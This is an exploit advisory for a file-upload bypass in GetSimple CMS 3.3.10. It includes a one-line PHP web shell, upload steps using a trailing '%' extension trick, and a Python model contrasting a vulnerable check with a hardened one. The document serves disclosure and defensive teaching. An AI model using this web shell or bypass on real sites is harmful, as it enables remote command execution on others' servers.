
# Exploit Title: Getsimple CMS <= 3.3.10 Arbitrary File Upload Vulnerability
# Google Dork: -
# Date: 23/06/2016
# Exploit Author: s0nk3y
# Vendor Homepage: http://get-simple.info/
# Category: webapps
# Software Link: http://get-simple.info/data/uploads/releases/GetSimpleCMS-3.3.10.zip
# Version: 3.3.10
# Tested on: Ubuntu 16.04 / Mozilla Firefox
# Twitter: http://twitter.com/s0nk3y
# Linkedin: Rahmat Nurfauzi - http://linkedin.com/in/rahmatnurfauzi

Description
========================

GetSimple CMS has been downloaded over 120,000 times (as of March 2013).
The magazine t3n classifies GetSimple as a "micro" or "minimal" CMS and praises
its simplicity combined with the extensibility its plug-in system offers.

Vulnerability
========================

GetSimple CMS 3.3.10 suffers from an arbitrary file upload vulnerability that
allows an authenticated attacker (a user who can reach the admin file-upload
page) to upload a PHP backdoor.

The upload handler decides whether a file is acceptable by comparing its
extension and MIME type against a blacklist and a whitelist. The comparison is
made on the filename exactly as submitted, so an extension that has been
altered with one extra trailing character matches neither list, and the file
is accepted even though what ends up under "/data/uploads/" is a PHP backdoor.

Proof of Concept
========================

To exploit this, create the backdoor with a percent sign appended to its
extension, so that the extension check sees "php%" instead of "php".

1. Name the file evil.php% (this is the whole trick) and give it the following
   content:

<?php
// simple backdoor: runs the shell command passed in the "cmd" GET parameter
system($_GET['cmd']);
?>

2. Log in to the admin panel and upload the backdoor through the file-upload page.

3. The uploaded file is placed under the "/data/uploads/" folder.

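The following is an added example, written for this page in Python; it is not the advisory's code and not GetSimple's upload handler. It models the class of bug the steps above exploit: a blacklist applied to the submitted name and the client-declared MIME type, followed by a "clean filename" step that strips characters outside a safe set, so that `evil.php%` passes the check as `php%` and is then written as `evil.php`. The blocked/allowed lists, the sanitization regex and the assumption that the name is cleaned after the check are all assumptions of this example, made to show why the trailing `%` works and how a check on the stored name fixes it.

```python
import os
import re
from typing import Optional

# Constructed illustration of the bug class, not GetSimple's code.
# Lists, regex and the order of operations are assumptions for the example.

BLOCKED_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar", "pl", "cgi", "exe"}
BLOCKED_MIME_TYPES = {"application/x-httpd-php", "application/x-php", "text/x-php"}
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt", "zip"}


def extension_of(filename: str) -> str:
    """Return the lowercased text after the last dot of the base name, or '' if none."""
    base = os.path.basename(filename)
    if "." not in base:
        return ""
    return base.rsplit(".", 1)[1].lower()


def sanitize_name(filename: str) -> str:
    """Assumed 'clean filename' step: drop every character outside [A-Za-z0-9_.-].

    This is what turns the submitted name 'evil.php%' into the stored name 'evil.php'.
    """
    return re.sub(r"[^A-Za-z0-9_.-]", "", os.path.basename(filename))


def vulnerable_upload(filename: str, declared_mime: str) -> Optional[str]:
    """Blacklist the raw submitted extension and the client-declared MIME type,
    then sanitize the name.  Returns the stored filename, or None if rejected.

    'evil.php%' has the extension 'php%', which is on no list, so it is accepted;
    sanitization then removes the '%' and 'evil.php' is written to the upload dir.
    """
    if extension_of(filename) in BLOCKED_EXTENSIONS:
        return None
    if declared_mime.lower() in BLOCKED_MIME_TYPES:
        return None
    return sanitize_name(filename)


def hardened_upload(filename: str, declared_mime: str) -> Optional[str]:
    """Validate exactly the name that will be written, against a whitelist.

    The client-declared MIME type is attacker-controlled and is deliberately
    ignored; only the final stored name decides acceptance.
    """
    stored = sanitize_name(filename)
    if stored in ("", ".", "..") or stored.startswith("."):
        return None
    # Exactly one dot: rejects double extensions such as 'shell.php.jpg' and bare names.
    if stored.count(".") != 1:
        return None
    if extension_of(stored) not in ALLOWED_EXTENSIONS:
        return None
    return stored


if __name__ == "__main__":
    for name in ("evil.php", "evil.php%", "photo.jpg", "shell.php.jpg"):
        print(f"{name:16} vulnerable -> {vulnerable_upload(name, 'image/jpeg')!s:10} "
              f"hardened -> {hardened_upload(name, 'image/jpeg')}")
```

The difference between the two paths is where the check sits: the vulnerable version inspects the submitted name and then transforms it, so the name that is checked is not the name that is stored; the hardened version transforms first and whitelists the result, so no later step can change what was approved.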
Report Timeline
========================

2016-06-23 : Vulnerability reported to vendor
2016-06-23 : Disclosure